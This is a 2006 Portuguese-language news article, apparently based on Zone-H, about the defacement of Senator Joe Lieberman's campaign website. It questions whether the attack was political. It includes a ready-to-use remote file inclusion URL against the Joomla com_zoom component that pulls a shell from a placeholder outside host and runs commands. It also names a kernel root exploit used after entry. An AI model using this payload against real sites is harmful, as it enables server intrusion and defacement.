Site da campanha de Lieberman atacado por motivos políticos!? O outro lado da história por Zone-H
11/08/2006 Written by Marcelo Almeida (Vympel)
O site da campanha do Senador americano Joe Lieberman foi recentemente alvejado por crackers, e no mínimo 3 vezes, como informou seu assessor.
Em dois casos o site do Senador sofreu deface (você pode verificar a mirror aqui), e segunda uma informação recente, ele estava sofrendo um ataque de negação de serviço (DDoS). No site do Senador tem a mensagem que esta sendo “atacado por seus opositores políticos”.
Ele até mesmo questionou se seu oponente Ned Lamont “achava justo fazer este tipo de jogo sujo e ataques desqualificados desta maneira e por que não parava e desistia destas atitudes”.
Mas será verdade?
Zone-H tem pelo menos uma coisa a dizer, pelo menos na parte da invasão…
Verificando rapidamente no site do netcraft podemos ver que o site esta rodando Linux com Apache/1.3.36 (sem ficar offline desde dia 16 do mês passado deixando dúvidas sobre o ataque de DDoS…) e uma busca rápida no cache google podemos ver que o site usa Joomla! (nós também usamos… mas um pouco modificado) com um component com_zoom usado para visualização de vários tipos de mídias, que tem uma falha de remote include.
Exemplo do funcionamento da falha:
http://target/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://exploitsite/shell.gif?&cmd=ls
Com este comando um ataque irá o comando LS do linux dentro do site que estiver rodando esta versão vulnerável retornando a listagem das pastas no diretório do site.
Com este tipo de falha um invasor pode executar qualquer tipo de comando que o servidor estiver configurando para permitir inclusive wget, lynx, curl etc… e fazer o download de um backdoor que abre u ma porta para o cracker penetrar no servidor. Uma vez dentro do servidor o cracker usou para obter acesso root o novo exploit RAPTOR PCRTL para kernel’s 2.6.* (conforme relato do defacer, esta era a versão do kernel no servidor).
Quando entramos em contato com o defacer, também perguntamos se foi motivos políticos relacionados à guerra no Líbano (pois o mesmo é da Turquia e poderia esta apoiando na quantidade enorme de ataques que estão sendo feitas diariamente com protestos contra a guerra) que levaram ao ataque, e ele respondeu: “Não, foi só por diversão”.
Perguntamos para ele também se estava dando ataque de DdoS no site do Senador ou se sabia de alguém que o estava fazendo ele respondeu que não e que continuou acessando o servidor desde o dia da invasão, e como hoje, sempre esteve on-line deixando mais dúvidas sobre a história de DDoS também.
Pelas respostas do cracker podemos ter a certeza que o ataque foi sem nenhum intenção de interferir na campanha do Senador e que depois de fazer a invasão foi atacar outros sites “só por diversão”…
Share this content:





